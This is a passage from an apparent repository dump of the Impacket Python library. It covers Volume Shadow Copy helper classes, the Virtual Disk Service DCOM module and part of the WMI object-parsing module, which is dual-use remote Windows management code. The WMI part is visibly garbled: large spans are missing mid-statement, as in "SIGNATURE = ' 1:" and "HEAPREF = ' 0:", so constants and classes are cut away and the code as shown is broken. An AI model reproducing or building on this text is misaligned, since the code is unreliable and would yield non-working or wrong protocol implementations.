{\n}\n\n################################################################################\n# HELPER FUNCTIONS AND INTERFACES\n################################################################################\nclass IVssEnumMgmtObject(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self, interface)\n self._iid = IID_IVssEnumMgmtObject\n\n def Next(self, celt):\n request = IVssEnumMgmtObject_Next()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['celt'] = celt\n resp = self.request(request, self._iid, uuid = self.get_iPid())\n return resp \n\nclass IVssEnumObject(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self, interface)\n self._iid = IID_IVssEnumObject\n\n def Next(self, celt):\n request = IVssEnumObject_Next()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['celt'] = celt\n dce = self.connect()\n resp = dce.request(request, self._iid, uuid = self.get_iPid())\n return resp \n\nclass IVssSnapshotMgmt(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self, interface)\n self._iid = IID_IVssSnapshotMgmt\n\n def GetProviderMgmtInterface(self, providerId = IID_ShadowCopyProvider, interfaceId = IID_IVssDifferentialSoftwareSnapshotMgmt):\n req = GetProviderMgmtInterface()\n classInstance = self.get_cinstance()\n req['ORPCthis'] = classInstance.get_ORPCthis()\n req['ORPCthis']['flags'] = 0\n req['ProviderId'] = providerId\n req['InterfaceId'] = interfaceId\n resp = self.request(req, self._iid, uuid = self.get_iPid())\n return IVssDifferentialSoftwareSnapshotMgmt(INTERFACE(classInstance, ''.join(resp['ppItf']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))\n\n def QueryVolumesSupportedForSnapshots(self, providerId, iContext):\n req = QueryVolumesSupportedForSnapshots()\n classInstance = self.get_cinstance()\n req['ORPCthis'] = classInstance.get_ORPCthis()\n req['ORPCthis']['flags'] = 0\n req['ProviderId'] = providerId\n req['IContext'] = iContext\n resp = self.request(req, self._iid, uuid = self.get_iPid())\n return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),target = self.get_target()))\n\n def QuerySnapshotsByVolume(self, volumeName, providerId = IID_ShadowCopyProvider):\n req = QuerySnapshotsByVolume()\n classInstance = self.get_cinstance()\n req['ORPCthis'] = classInstance.get_ORPCthis()\n req['ORPCthis']['flags'] = 0\n req['pwszVolumeName'] = volumeName\n req['ProviderId'] = providerId\n try:\n resp = self.request(req, self._iid, uuid = self.get_iPid())\n except DCERPCException as e:\n print(e)\n from impacket.winregistry import hexdump\n data = e.get_packet()\n hexdump(data)\n kk = QuerySnapshotsByVolumeResponse(data)\n kk.dump()\n #resp.dump()\n return IVssEnumObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))\n\nclass IVssDifferentialSoftwareSnapshotMgmt(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self, interface)\n self._iid = IID_IVssDifferentialSoftwareSnapshotMgmt\n\n def QueryDiffAreasOnVolume(self, pwszVolumeName):\n req = QueryDiffAreasOnVolume()\n classInstance = self.get_cinstance()\n req['ORPCthis'] = classInstance.get_ORPCthis()\n req['ORPCthis']['flags'] = 0\n req['pwszVolumeName'] = pwszVolumeName\n resp = self.request(req, self._iid, uuid = self.get_iPid())\n return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))\n\n def QueryDiffAreasForVolume(self, pwszVolumeName):\n req = QueryDiffAreasForVolume()\n classInstance = self.get_cinstance()\n req['ORPCthis'] = classInstance.get_ORPCthis()\n req['ORPCthis']['flags'] = 0\n req['pwszVolumeName'] = pwszVolumeName\n resp = self.request(req, self._iid, uuid = self.get_iPid())\n return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))\n" }, { "path": "impacket/dcerpc/v5/dcom/vds.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-VDS]: Virtual Disk Service (VDS) Protocol\n# This was used as a way to test the DCOM runtime. Further\n# testing is needed to verify it is working as expected\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/fortra/impacket/tree/master/tests/SMB_RPC\n#\n# Since DCOM is like an OO RPC, instead of helper functions you will see the\n# classes described in the standards developed.\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\nfrom __future__ import division\nfrom __future__ import print_function\nfrom impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantVaryingArray, NDRENUM\nfrom impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown2, PMInterfacePointer, INTERFACE\nfrom impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, DWORD, SHORT, GUID\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.enum import Enum\nfrom impacket import hresult_errors\nfrom impacket.uuid import string_to_bin\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n if self.error_code in hresult_errors.ERROR_MESSAGES:\n error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]\n error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] \n return 'VDS SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'VDS SessionError: unknown error code: 0x%x' % (self.error_code)\n\n################################################################################\n# CONSTANTS\n################################################################################\n# 1.9 Standards Assignments\nCLSID_VirtualDiskService = string_to_bin('7D1933CB-86F6-4A98-8628-01BE94C9A575')\nIID_IEnumVdsObject = string_to_bin('118610B7-8D94-4030-B5B8-500889788E4E')\nIID_IVdsAdviseSink = string_to_bin('8326CD1D-CF59-4936-B786-5EFC08798E25')\nIID_IVdsAsync = string_to_bin('D5D23B6D-5A55-4492-9889-397A3C2D2DBC')\nIID_IVdsServiceInitialization = string_to_bin('4AFC3636-DB01-4052-80C3-03BBCB8D3C69')\nIID_IVdsService = string_to_bin('0818A8EF-9BA9-40D8-A6F9-E22833CC771E')\nIID_IVdsSwProvider = string_to_bin('9AA58360-CE33-4F92-B658-ED24B14425B8')\nIID_IVdsProvider = string_to_bin('10C5E575-7984-4E81-A56B-431F5F92AE42')\n\nerror_status_t = ULONG\n\n# 2.2.1.1.3 VDS_OBJECT_ID\nVDS_OBJECT_ID = GUID\n\n################################################################################\n# STRUCTURES\n################################################################################\n# 2.2.2.1.3.1 VDS_SERVICE_PROP\nclass VDS_SERVICE_PROP(NDRSTRUCT):\n structure = (\n ('pwszVersion',LPWSTR),\n ('ulFlags',ULONG),\n )\n\nclass OBJECT_ARRAY(NDRUniConformantVaryingArray):\n item = PMInterfacePointer\n\n# 2.2.2.7.1.1 VDS_PROVIDER_TYPE\nclass VDS_PROVIDER_TYPE(NDRENUM):\n class enumItems(Enum):\n VDS_PT_UNKNOWN = 0\n VDS_PT_SOFTWARE = 1\n VDS_PT_HARDWARE = 2\n VDS_PT_VIRTUALDISK = 3\n VDS_PT_MAX = 4\n\n# 2.2.2.7.2.1 VDS_PROVIDER_PROP\nclass VDS_PROVIDER_PROP(NDRSTRUCT):\n structure = (\n ('id',VDS_OBJECT_ID),\n ('pwszName',LPWSTR),\n ('guidVersionId',GUID),\n ('pwszVersion',LPWSTR),\n ('type',VDS_PROVIDER_TYPE),\n ('ulFlags',ULONG),\n ('ulStripeSizeFlags',ULONG),\n ('sRebuildPriority',SHORT),\n )\n\n################################################################################\n# RPC CALLS\n################################################################################\n\n# 3.4.5.2.5.1 IVdsServiceInitialization::Initialize (Opnum 3)\nclass IVdsServiceInitialization_Initialize(DCOMCALL):\n opnum = 3\n structure = (\n ('pwszMachineName', LPWSTR),\n )\n\nclass IVdsServiceInitialization_InitializeResponse(DCOMANSWER):\n structure = (\n ('ErrorCode', error_status_t),\n )\n\n# 3.4.5.2.4.1 IVdsService::IsServiceReady (Opnum 3)\nclass IVdsService_IsServiceReady(DCOMCALL):\n opnum = 3\n structure = (\n )\n\nclass IVdsService_IsServiceReadyResponse(DCOMANSWER):\n structure = (\n ('ErrorCode', error_status_t),\n )\n\n# 3.4.5.2.4.2 IVdsService::WaitForServiceReady (Opnum 4)\nclass IVdsService_WaitForServiceReady(DCOMCALL):\n opnum = 4\n structure = (\n )\n\nclass IVdsService_WaitForServiceReadyResponse(DCOMANSWER):\n structure = (\n ('ErrorCode', error_status_t),\n )\n\n# 3.4.5.2.4.3 IVdsService::GetProperties (Opnum 5)\nclass IVdsService_GetProperties(DCOMCALL):\n opnum = 5\n structure = (\n )\n\nclass IVdsService_GetPropertiesResponse(DCOMANSWER):\n structure = (\n ('pServiceProp', VDS_SERVICE_PROP),\n ('ErrorCode', error_status_t),\n )\n\n# 3.4.5.2.4.4 IVdsService::QueryProviders (Opnum 6)\nclass IVdsService_QueryProviders(DCOMCALL):\n opnum = 6\n structure = (\n ('masks', DWORD),\n )\n\nclass IVdsService_QueryProvidersResponse(DCOMANSWER):\n structure = (\n ('ppEnum', PMInterfacePointer),\n ('ErrorCode', error_status_t),\n )\n\n# 3.1.1.1 IEnumVdsObject Interface\n# 3.4.5.2.1.1 IEnumVdsObject::Next (Opnum 3)\nclass IEnumVdsObject_Next(DCOMCALL):\n opnum = 3\n structure = (\n ('celt', ULONG),\n )\n\nclass IEnumVdsObject_NextResponse(DCOMANSWER):\n structure = (\n ('ppObjectArray', OBJECT_ARRAY),\n ('pcFetched', ULONG),\n ('ErrorCode', error_status_t),\n )\n# 3.4.5.2.14.1 IVdsProvider::GetProperties (Opnum 3)\nclass IVdsProvider_GetProperties(DCOMCALL):\n opnum = 3\n structure = (\n )\n\nclass IVdsProvider_GetPropertiesResponse(DCOMANSWER):\n structure = (\n ('pProviderProp', VDS_PROVIDER_PROP),\n ('ErrorCode', error_status_t),\n )\n\n################################################################################\n# OPNUMs and their corresponding structures\n################################################################################\nOPNUMS = {\n}\n\n################################################################################\n# HELPER FUNCTIONS AND INTERFACES\n################################################################################\nclass IEnumVdsObject(IRemUnknown2):\n def Next(self, celt=0xffff):\n request = IEnumVdsObject_Next()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['celt'] = celt\n try:\n resp = self.request(request, uuid = self.get_iPid())\n except Exception as e:\n resp = e.get_packet()\n # If it is S_FALSE(1) means less items were returned\n if resp['ErrorCode'] != 1:\n raise\n interfaces = list()\n for interface in resp['ppObjectArray']:\n interfaces.append(IRemUnknown2(INTERFACE(self.get_cinstance(), ''.join(interface['abData']), self.get_ipidRemUnknown(), target = self.get_target())))\n return interfaces\n\nclass IVdsProvider(IRemUnknown2):\n def GetProperties(self):\n request = IVdsProvider_GetProperties()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\nclass IVdsServiceInitialization(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self, interface)\n\n def Initialize(self):\n request = IVdsServiceInitialization_Initialize()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['pwszMachineName'] = '\\x00'\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\nclass IVdsService(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self, interface)\n\n def IsServiceReady(self):\n request = IVdsService_IsServiceReady()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n try:\n resp = self.request(request, uuid = self.get_iPid())\n except Exception as e:\n resp = e.get_packet()\n return resp \n\n def WaitForServiceReady(self):\n request = IVdsService_WaitForServiceReady()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\n def GetProperties(self):\n request = IVdsService_GetProperties()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\n def QueryProviders(self, masks):\n request = IVdsService_QueryProviders()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['masks'] = masks\n resp = self.request(request, uuid = self.get_iPid())\n return IEnumVdsObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))\n" }, { "path": "impacket/dcerpc/v5/dcom/wmi.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-WMI]/[MS-WMIO] : Windows Management Instrumentation Remote Protocol. Partial implementation\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/fortra/impacket/tree/master/tests/SMB_RPC\n#\n# Since DCOM is like an OO RPC, instead of helper functions you will see the\n# classes described in the standards developed.\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\nfrom __future__ import division\nfrom __future__ import print_function\nfrom struct import unpack, calcsize, pack\nfrom functools import partial\nimport collections\nimport collections.abc\nimport logging\nimport six\nfrom collections import OrderedDict\n\nfrom impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantArray, NDRPOINTER, NDRUniConformantVaryingArray, NDRUNION, \\\n NDRENUM\nfrom impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown, PMInterfacePointer, INTERFACE, \\\n PMInterfacePointer_ARRAY, BYTE_ARRAY, PPMInterfacePointer, OBJREF_CUSTOM\nfrom impacket.dcerpc.v5.dcom.oaut import BSTR\nfrom impacket.dcerpc.v5.dtypes import ULONG, DWORD, NULL, LPWSTR, LONG, HRESULT, PGUID, LPCSTR, GUID\nfrom impacket.dcerpc.v5.enum import Enum\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket import hresult_errors, LOG\nfrom impacket.uuid import string_to_bin, uuidtup_to_bin\nfrom impacket.structure import Structure, hexdump\n\n\ndef format_structure(d, level=0):\n x = \"\"\n if isinstance(d, collections.abc.Mapping):\n lenk = max([len(str(x)) for x in list(d.keys())])\n for k, v in list(d.items()):\n key_text = \"\\n\" + \" \"*level + \" \"*(lenk - len(str(k))) + str(k)\n x += key_text + \": \" + format_structure(v, level=level+lenk)\n elif isinstance(d, collections.abc.Iterable) and not isinstance(d, str):\n for e in d:\n x += \"\\n\" + \" \"*level + \"- \" + format_structure(e, level=level+4)\n else:\n x = str(d)\n return x\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n if self.error_code in hresult_errors.ERROR_MESSAGES:\n error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]\n error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] \n return 'WMI SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n # Let's see if we have it as WBEMSTATUS\n try:\n return 'WMI Session Error: code: 0x%x - %s' % (self.error_code, WBEMSTATUS.enumItems(self.error_code).name)\n except:\n return 'WMI SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# WMIO Structures and Constants\n################################################################################\nWBEM_FLAVOR_FLAG_PROPAGATE_O_INSTANCE = 0x01\nWBEM_FLAVOR_FLAG_PROPAGATE_O_DERIVED_CLASS = 0x02\nWBEM_FLAVOR_NOT_OVERRIDABLE = 0x10\nWBEM_FLAVOR_ORIGIN_PROPAGATED = 0x20\nWBEM_FLAVOR_ORIGIN_SYSTEM = 0x40\nWBEM_FLAVOR_AMENDED = 0x80\n\n\n# 2.2.6 ObjectFlags\nOBJECT_FLAGS = 'B=0'\nCIM_CLASS = 0x01\nCIM_INSTANCE = 0x02\nCIM_DECORATION = 0x04\n\n#2.2.77 Signature\nSIGNATURE = ' 1:\n if self['Encoded_String_Flag'] == 0:\n self.structure += self.tascii\n # Let's search for the end of the string\n index = data[1:].find(b'\\x00')\n data = data[:index+1+1]\n else:\n self.structure = self.tunicode\n self.isUnicode = True\n\n self.fromString(data)\n else:\n self.structure = self.tascii\n self.data = None\n\n def __getitem__(self, key):\n if key == 'Character' and self.isUnicode:\n return self.fields['Character'].decode('utf-16le')\n return Structure.__getitem__(self, key)\n\n\n# 2.2.8 DecServerName\nDEC_SERVER_NAME = ENCODED_STRING\n\n# 2.2.9 DecNamespaceName\nDEC_NAMESPACE_NAME = ENCODED_STRING\n\n# 2.2.7 Decoration\nclass DECORATION(Structure):\n structure = (\n ('DecServerName', ':', DEC_SERVER_NAME),\n ('DecNamespaceName', ':', DEC_NAMESPACE_NAME),\n )\n\n# 2.2.69 HeapRef\nHEAPREF = ' 0:\n itemn = QUALIFIER(data)\n if itemn['QualifierName'] == 0xffffffff:\n qName = b''\n elif itemn['QualifierName'] & 0x80000000:\n qName = DICTIONARY_REFERENCE[itemn['QualifierName'] & 0x7fffffff]\n else:\n qName = ENCODED_STRING(heap[itemn['QualifierName']:])['Character']\n\n value = ENCODED_VALUE.getValue(itemn['QualifierType'], itemn['QualifierValue'], heap)\n qualifiers[qName] = value\n data = data[len(itemn):]\n\n return qualifiers\n \n# 2.2.20 ClassQualifierSet\nCLASS_QUALIFIER_SET = QUALIFIER_SET\n\n# 2.2.22 PropertyCount\nPROPERTY_COUNT = ' 0:\n record = QUALIFIER(qualifiersBuf)\n if record['QualifierName'] & 0x80000000:\n qualifierName = DICTIONARY_REFERENCE[record['QualifierName'] & 0x7fffffff]\n else:\n qualifierName = ENCODED_STRING(heap[record['QualifierName']:])['Character']\n qualifierValue = ENCODED_VALUE.getValue(record['QualifierType'], record['QualifierValue'], heap)\n qualifiersBuf = qualifiersBuf[len(record):]\n qualifiers[qualifierName] = qualifierValue\n\n propItemDict['qualifiers'] = qualifiers\n properties[propName] = propItemDict\n\n propTable = propTable[self.PropertyLookupSize:]\n\n return OrderedDict(sorted(list(properties.items()), key=lambda x:x[1]['order']))\n #return properties\n\n# 2.2.66 Heap\nHEAP_LENGTH = ' 0:\n value = ENCODED_VALUE.getValue(properties[key]['type'], itemValue, heap)\n properties[key]['value'] = \"%s\" % value\n valueTable = valueTable[dataSize:]\n return properties\n \n# 2.2.39 MethodCount\nMETHOD_COUNT = ' 0:\n methodDict['InParams'] = inputSignature['ObjectBlock']['ClassType']['CurrentClass'].getProperties()\n methodDict['InParamsRaw'] = inputSignature['ObjectBlock']\n #print methodDict['InParams'] \n else:\n methodDict['InParams'] = None\n if itemn['OutputSignature'] != 0xffffffff:\n outputSignature = METHOD_SIGNATURE_BLOCK(heap[itemn['OutputSignature']:])\n if outputSignature['EncodingLength'] > 0:\n methodDict['OutParams'] = outputSignature['ObjectBlock']['ClassType']['CurrentClass'].getProperties()\n methodDict['OutParamsRaw'] = outputSignature['ObjectBlock']\n else:\n methodDict['OutParams'] = None\n data = data[len(itemn):]\n methods[methodDict['name']] = methodDict\n\n return methods\n\n# 2.2.14 ClassAndMethodsPart\nclass CLASS_AND_METHODS_PART(Structure):\n structure = (\n ('ClassPart', ':', CLASS_PART),\n ('MethodsPart', ':', METHODS_PART),\n )\n\n def getClassName(self):\n pClassName = self['ClassPart']['ClassHeader']['ClassNameRef']\n cHeap = self['ClassPart']['ClassHeap']['HeapItem']\n if pClassName == 0xffffffff:\n return 'None'\n else:\n buffer = cHeap[pClassName:]\n if not buffer:\n return ''\n className = ENCODED_STRING(buffer)['Character']\n derivationList = self['ClassPart']['DerivationList']['ClassNameEncoding']\n while len(derivationList) > 0:\n superClass = ENCODED_STRING(derivationList)['Character']\n className += ' : %s ' % superClass\n derivationList = derivationList[len(ENCODED_STRING(derivationList))+4:]\n return className\n\n def getQualifiers(self):\n return self[\"ClassPart\"].getQualifiers()\n\n def getProperties(self):\n #print format_structure(self[\"ClassPart\"].getProperties())\n return self[\"ClassPart\"].getProperties()\n\n def getMethods(self):\n return self[\"MethodsPart\"].getMethods()\n\n# 2.2.13 CurrentClass\nCURRENT_CLASS = CLASS_AND_METHODS_PART\n\n# 2.2.54 InstanceFlags\nINSTANCE_FLAGS = 'B=0'\n\n# 2.2.55 InstanceClassName\nINSTANCE_CLASS_NAME = HEAP_STRING_REF\n\n# 2.2.27 NullAndDefaultFlag\nNULL_AND_DEFAULT_FLAG = 'B=0'\n\n# 2.2.26 NdTable\nNDTABLE = NULL_AND_DEFAULT_FLAG\n\n# 2.2.56 InstanceData\n#InstanceData = ValueTable\n\nclass CURRENT_CLASS_NO_METHODS(CLASS_AND_METHODS_PART):\n structure = (\n ('ClassPart', ':', CLASS_PART),\n )\n def getMethods(self):\n return ()\n\n# 2.2.65 InstancePropQualifierSet\nINST_PROP_QUAL_SET_FLAG = 'B=0'\nclass INSTANCE_PROP_QUALIFIER_SET(Structure):\n commonHdr = (\n ('InstPropQualSetFlag', INST_PROP_QUAL_SET_FLAG),\n )\n tail = (\n # ToDo: this is wrong.. this should be an array of QualifierSet, see documentation\n #('QualifierSet', ':', QualifierSet),\n ('QualifierSet', ':', QUALIFIER_SET),\n )\n\n def __init__(self, data = None, alignment = 0):\n Structure.__init__(self, data, alignment)\n self.structure = ()\n if data is not None:\n # Let's first check the commonHdr\n self.fromString(data)\n if self['InstPropQualSetFlag'] == 2:\n # We don't support this yet!\n raise Exception(\"self['InstPropQualSetFlag'] == 2\")\n self.fromString(data)\n else:\n self.data = None\n\n# 2.2.57 InstanceQualifierSet\nclass INSTANCE_QUALIFIER_SET(Structure):\n structure = (\n ('QualifierSet', ':', QUALIFIER_SET),\n ('InstancePropQualifierSet', ':', INSTANCE_PROP_QUALIFIER_SET),\n )\n\n# 2.2.58 InstanceHeap\nINSTANCE_HEAP = HEAP\n\n# 2.2.53 InstanceType\nclass INSTANCE_TYPE(Structure):\n commonHdr = (\n ('CurrentClass', ':', CURRENT_CLASS_NO_METHODS),\n ('EncodingLength', ENCODING_LENGTH),\n ('InstanceFlags', INSTANCE_FLAGS),\n ('InstanceClassName', INSTANCE_CLASS_NAME),\n ('_NdTable_ValueTable', '_-NdTable_ValueTable',\n 'self[\"CurrentClass\"][\"ClassPart\"][\"ClassHeader\"][\"NdTableValueTableLength\"]'),\n ('NdTable_ValueTable',':'),\n ('InstanceQualifierSet', ':', INSTANCE_QUALIFIER_SET),\n ('InstanceHeap', ':', INSTANCE_HEAP),\n )\n\n def __init__(self, data = None, alignment = 0):\n Structure.__init__(self, data, alignment)\n self.structure = ()\n if data is not None:\n # Let's first check the commonHdr\n self.fromString(data)\n #hexdump(data[len(self.getData()):])\n self.NdTableSize = (self['CurrentClass']['ClassPart']['PropertyLookupTable']['PropertyCount'] - 1) //4 + 1\n #self.InstanceDataSize = self['CurrentClass']['ClassPart']['PropertyLookupTable']['PropertyCount'] * len(InstanceData())\n self.fromString(data)\n else:\n self.data = None\n\n def __processNdTable(self, properties):\n octetCount = (len(properties) - 1) // 4 + 1 # see [MS-WMIO]: 2.2.26 NdTable\n packedNdTable = self['NdTable_ValueTable'][:octetCount]\n unpackedNdTable = [(byte >> shift) & 0b11 for byte in six.iterbytes(packedNdTable) for shift in (0, 2, 4, 6)]\n for key in properties:\n ndEntry = unpackedNdTable[properties[key]['order']]\n properties[key]['null_default'] = bool(ndEntry & 0b01)\n properties[key]['inherited_default'] = bool(ndEntry & 0b10)\n\n return octetCount\n\n @staticmethod\n def __isNonNullNumber(prop):\n return prop['type'] & ~Inherited in CIM_NUMBER_TYPES and not prop['null_default']\n\n def getValues(self, properties):\n heap = self[\"InstanceHeap\"][\"HeapItem\"]\n valueTableOff = self.__processNdTable(properties)\n valueTable = self['NdTable_ValueTable'][valueTableOff:]\n sorted_props = sorted(list(properties.keys()), key=lambda k: properties[k]['order'])\n for key in sorted_props:\n pType = properties[key]['type'] & (~(CIM_ARRAY_FLAG|Inherited))\n if properties[key]['type'] & CIM_ARRAY_FLAG:\n unpackStr = HEAPREF[:-2]\n else:\n unpackStr = CIM_TYPES_REF[pType][:-2]\n dataSize = calcsize(unpackStr)\n try:\n itemValue = unpack(unpackStr, valueTable[:dataSize])[0]\n except:\n LOG.error(\"getValues: Error Unpacking!\")\n itemValue = 0xffffffff\n\n # if itemValue == 0, default value remains\n if itemValue != 0 or self.__isNonNullNumber(properties[key]):\n value = ENCODED_VALUE.getValue( properties[key]['type'], itemValue, heap)\n properties[key]['value'] = value\n # is the value set valid or should we clear it? ( if not inherited )\n elif properties[key]['inherited'] == 0:\n properties[key]['value'] = None\n valueTable = valueTable[dataSize:]\n return properties\n\n# 2.2.12 ParentClass\nPARENT_CLASS = CLASS_AND_METHODS_PART\n\n# 2.2.13 CurrentClass\nCURRENT_CLASS = CLASS_AND_METHODS_PART\n\nclass CLASS_TYPE(Structure):\n structure = (\n ('ParentClass', ':', PARENT_CLASS),\n ('CurrentClass', ':', CURRENT_CLASS),\n )\n\n# 2.2.5 ObjectBlock\nclass OBJECT_BLOCK(Structure):\n commonHdr = (\n ('ObjectFlags', OBJECT_FLAGS),\n )\n\n decoration = (\n ('Decoration', ':', DECORATION),\n )\n\n instanceType = (\n ('InstanceType', ':', INSTANCE_TYPE),\n )\n\n classType = (\n ('ClassType', ':', CLASS_TYPE),\n )\n def __init__(self, data = None, alignment = 0):\n Structure.__init__(self, data, alignment)\n self.ctParent = None\n self.ctCurrent = None\n\n if data is not None:\n self.structure = ()\n if ord(data[0:1]) & 0x4:\n # WMIO - 2.2.6 - 0x04 If this flag is set, the object has a Decoration block.\n self.structure += self.decoration\n if ord(data[0:1]) & 0x01:\n # The object is a CIM class. \n self.structure += self.classType\n else:\n self.structure += self.instanceType\n\n self.fromString(data)\n else:\n self.data = None\n\n def isInstance(self):\n if self['ObjectFlags'] & CIM_CLASS:\n return False\n return True\n\n def printClass(self, pClass, cInstance = None):\n qualifiers = pClass.getQualifiers()\n\n for qualifier in qualifiers:\n print(\"[%s]\" % qualifier)\n\n className = pClass.getClassName()\n\n print(\"class %s \\n{\" % className)\n\n properties = pClass.getProperties()\n if cInstance is not None:\n properties = cInstance.getValues(properties)\n\n for pName in properties:\n #if property['inherited'] == 0:\n qualifiers = properties[pName]['qualifiers']\n for qName in qualifiers:\n if qName != 'CIMTYPE':\n print('\\t[%s(%s)]' % (qName, qualifiers[qName]))\n print(\"\\t%s %s\" % (properties[pName]['stype'], properties[pName]['name']), end=' ')\n if properties[pName]['value'] is not None:\n cimType = properties[pName]['type'] & (~Inherited)\n if cimType == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value:\n print('= IWbemClassObject\\n')\n elif cimType == CIM_TYPE_ENUM.CIM_ARRAY_OBJECT.value:\n if properties[pName]['value'] == 0:\n print('= %s\\n' % properties[pName]['value'])\n else:\n print('= %s\\n' % list('IWbemClassObject' for _ in range(len(properties[pName]['value']))))\n else:\n print('= %s\\n' % properties[pName]['value'])\n else:\n print('\\n')\n\n print() \n methods = pClass.getMethods()\n for methodName in methods:\n for qualifier in methods[methodName]['qualifiers']:\n print('\\t[%s]' % qualifier)\n\n if methods[methodName]['InParams'] is None and methods[methodName]['OutParams'] is None: \n print('\\t%s %s();\\n' % ('void', methodName))\n if methods[methodName]['InParams'] is None and len(methods[methodName]['OutParams']) == 1:\n print('\\t%s %s();\\n' % (methods[methodName]['OutParams']['ReturnValue']['stype'], methodName))\n else:\n returnValue = b''\n if methods[methodName]['OutParams'] is not None:\n # Search the Return Value\n #returnValue = (item for item in method['OutParams'] if item[\"name\"] == \"ReturnValue\").next()\n if 'ReturnValue' in methods[methodName]['OutParams']:\n returnValue = methods[methodName]['OutParams']['ReturnValue']['stype']\n \n print('\\t%s %s(\\n' % (returnValue, methodName), end=' ')\n if methods[methodName]['InParams'] is not None:\n for pName in methods[methodName]['InParams']:\n print('\\t\\t[in] %s %s,' % (methods[methodName]['InParams'][pName]['stype'], pName))\n\n if methods[methodName]['OutParams'] is not None:\n for pName in methods[methodName]['OutParams']:\n if pName != 'ReturnValue':\n print('\\t\\t[out] %s %s,' % (methods[methodName]['OutParams'][pName]['stype'], pName))\n\n print('\\t);\\n')\n\n print(\"}\")\n\n def parseClass(self, pClass, cInstance = None):\n classDict = OrderedDict()\n classDict['name'] = pClass.getClassName()\n classDict['qualifiers'] = pClass.getQualifiers()\n classDict['properties'] = pClass.getProperties()\n classDict['methods'] = pClass.getMethods()\n if cInstance is not None:\n classDict['values'] = cInstance.getValues(classDict['properties'])\n else:\n classDict['values'] = None\n\n return classDict\n\n def parseObject(self):\n if (self['ObjectFlags'] & CIM_CLASS) == 0:\n # instance\n ctCurrent = self['InstanceType']['CurrentClass']\n currentName = ctCurrent.getClassName()\n if currentName is not None:\n self.ctCurrent = self.parseClass(ctCurrent, self['InstanceType'])\n return\n else: \n ctParent = self['ClassType']['ParentClass']\n ctCurrent = self['ClassType']['CurrentClass']\n\n parentName = ctParent.getClassName()\n if parentName is not None:\n self.ctParent = self.parseClass(ctParent)\n\n currentName = ctCurrent.getClassName()\n if currentName is not None:\n self.ctCurrent = self.parseClass(ctCurrent)\n\n def printInformation(self):\n # 